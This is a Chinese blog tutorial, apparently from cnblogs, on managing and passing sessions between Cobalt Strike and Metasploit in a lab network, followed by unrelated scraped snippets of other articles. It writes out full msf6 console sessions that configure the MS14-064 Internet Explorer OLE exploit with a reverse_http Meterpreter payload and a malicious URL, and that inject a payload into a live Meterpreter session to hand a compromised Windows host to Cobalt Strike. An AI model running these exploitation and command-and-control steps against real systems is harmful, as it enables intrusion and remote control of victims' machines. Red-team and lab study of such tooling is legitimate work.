CobaltStrike会话管理

时间：2023-01-10 00:23:39浏览次数：46

标签：set 管理 windows 会话 exploit CobaltStrike msf6 payload

cobalt strike派生会话

派生会话可以通过自身增加会话或者在其他的teamserver 做备份会话

在原有的监听器的基础上创建新的监听器

派生一个新的会话

cobalt strike派生metasploit会话

添加一个外部监听器

msf配置

派生会话到建好的外部监听器

成功派生到msf会话

metasploit 生成木马与cobalt strike会话

在攻击机上生成木马

上传至目标机

在CobaltStrike中创建新的监听器

运行上传的木马，目标机成功上线cs

metasploit使用溢出exp与cobalt strike会话

msf配置

msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set srvhost 192.168.86.135
srvhost => 192.168.86.135
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set LHOST 192.168.86.135
LHOST => 192.168.86.135
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set lport 9988
lport => 9988
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set disablepayloadhandler True
disablepayloadhandler => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) >

所生成的代码具有攻击性，目标机利用IE浏览器访问即可上线cs

http://192.168.86.135/cZ36HgfWbj

metasploit session 派生会话给cobalt strike

创建新的监听器

msf配置

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x86/windows  CatGod_PC\CatGod @ CATGOD_PC  192.168.86.135:9998 -> 192.168.86.134:50688 (192.168.86.134)
  
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.86.135
lhost => 192.168.86.135
msf6 exploit(windows/local/payload_inject) > set lport 6688
lport => 6688
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf6 exploit(windows/local/payload_inject) > run

成功上线cs

标签：set,管理,windows,会话,exploit,CobaltStrike,msf6,payload
From： https://www.cnblogs.com/CatG0d/p/CobaltStrike_sessions.html

质量管理的四大过程
1、资源管理过程（包括人，财、物、信息等）2、管理职责过程（确定方针目标，组织结构，内部沟通，职责权限、内部评审）3、产品实现过程（策划、销售、市场、设计和开发、采购、生产......
质量概念和质量管理演进的内涵
质量概念和质量管理演进的内涵阶段管理对象主要内容管理的任务质量检验产品全数检验和百分比检验满足产品标准的要求符合性质量满足过程控制......
六西格玛6Sigma管理概念
定义6Sigma并不是局部的改善，是以经营全体作为对象的“革新’活动。对能够引起不合格的根本性原因进行排除，以达到费用最小化和提高顾客满意度的经营革新活动。1.指标：100......
业务流程管理（BPM）系统的九大必备特点
当您搜索BPM或BPM系统时，会有很多选项供您选择：有些是基于公有云，有些支持私有化部署；一些按用户定价，一些一次性收费；还有的需要顾问，有的则需要自己动手操作······如何在这......
管理（划分）分区
管理工具列出块设备lsblk显示UUID和文件系统lsblk-f[root@rocky8~]#lsblkNAMEMAJ:MINRMSIZEROTYPEMOUNTPOINTsda8:00200G0d......
C语言信息工程学院成绩管理系统
C语言信息工程学院成绩管理系统信息工程学院成绩管理系统的设计与实现一、实训目的通过本次实训，提高学生C语言程序设计和程序调试能力，初步培养学生对软件开发的需求调研......
C语言学生管理系统[2023-01-09]
C语言学生管理系统[2023-01-09]学生管理系统利用数据结构的单链表的框架实现学生管理系统以下功能要求：1）学生个人信息：姓名、学号、专业、性别、年龄、联系方式、成绩。......
Windows Server 由于没有远程桌面授权服务器可以提供许可证，远程会话被中断。请跟服务
虚拟机内服务器由于没有远程桌面授权服务器可以提供许可证，远程会话被中断。请跟服务器管理员联系。WindowsServer2012R2Standard 尝试使用虚拟......
个人电子资料如何管理？个人电子档案用手机笔记软件保存更高效
在数字化时代，很多时候我们携带纸质版的个人资料并不方便，当我们需要随时使用个人资料的时候，也许电子版的资料可以帮助解决我们的燃眉之急。与传统纸质的个人资料和档案相比......
C语言居民小区水电费管理系统[2023-01-09]
C语言居民小区水电费管理系统[2023-01-09]居民小区水电费管理系统【问题详述】居民小区水电费管理系统可以对居民小区的用水、用电情况及应交费用进行查询与管理。物业......

CobaltStrike会话管理

cobalt strike派生会话

cobalt strike派生metasploit会话

metasploit 生成木马与cobalt strike会话

metasploit使用溢出exp与cobalt strike会话

metasploit session 派生会话给cobalt strike

相关文章

赞助商

阅读排行